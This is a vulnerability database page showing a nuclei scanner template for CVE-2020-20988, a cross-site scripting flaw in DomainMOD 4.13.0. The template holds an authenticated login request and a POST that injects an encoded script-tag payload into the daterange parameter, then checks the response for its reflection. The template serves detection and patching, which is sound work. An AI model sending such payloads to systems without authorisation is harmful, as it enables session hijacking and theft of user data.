Lucene search
K

DomainMOD 4.13.0 - Cross-Site Scripting

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

DomainMOD 4.13.0 - Cross-Site Scripting vulnerability in "or Expiring Between" paramete

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
Domainmod 跨站脚本漏洞
12 Aug 202100:00
cnnvd
CNVD
Domainmod Cross-Site Scripting Vulnerability (CNVD-2021-70162)
13 Aug 202100:00
cnvd
CVE
CVE-2020-20988
12 Aug 202121:07
cve
Cvelist
CVE-2020-20988
12 Aug 202121:07
cvelist
EUVD
EUVD-2020-13767
7 Oct 202500:30
euvd
NVD
CVE-2020-20988
12 Aug 202122:15
nvd
Prion
Cross site scripting
12 Aug 202122:15
prion
RedhatCVE
CVE-2020-20988
22 May 202515:46
redhatcve
id: CVE-2020-20988

info:
  name: DomainMOD 4.13.0 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://mycvee.blogspot.com/p/xss2.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-20988
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2020-20988
    cwe-id: CWE-79
    epss-score: 0.02329
    epss-percentile: 0.85106
    cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: domainmod
    product: domainmod
  tags: cve2020,cve,domainmod,xss,authenticated,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new_username={{username}}&new_password={{password}}
      - |
        POST /reporting/domains/cost-by-owner.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "value=\"\"/><script>alert(document.domain)</script>")'
          - 'contains(body_2, "DomainMOD")'
        condition: and
# digest: 4b0a00483046022100a3ddce8392f1d6d442ef84a700c252cfefd7400debb918b09581175e5807ab4f02210096e5a0978b28dcdc3077a06684ad913bbe8634a41232dc495527c44b9ad2c7ad:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation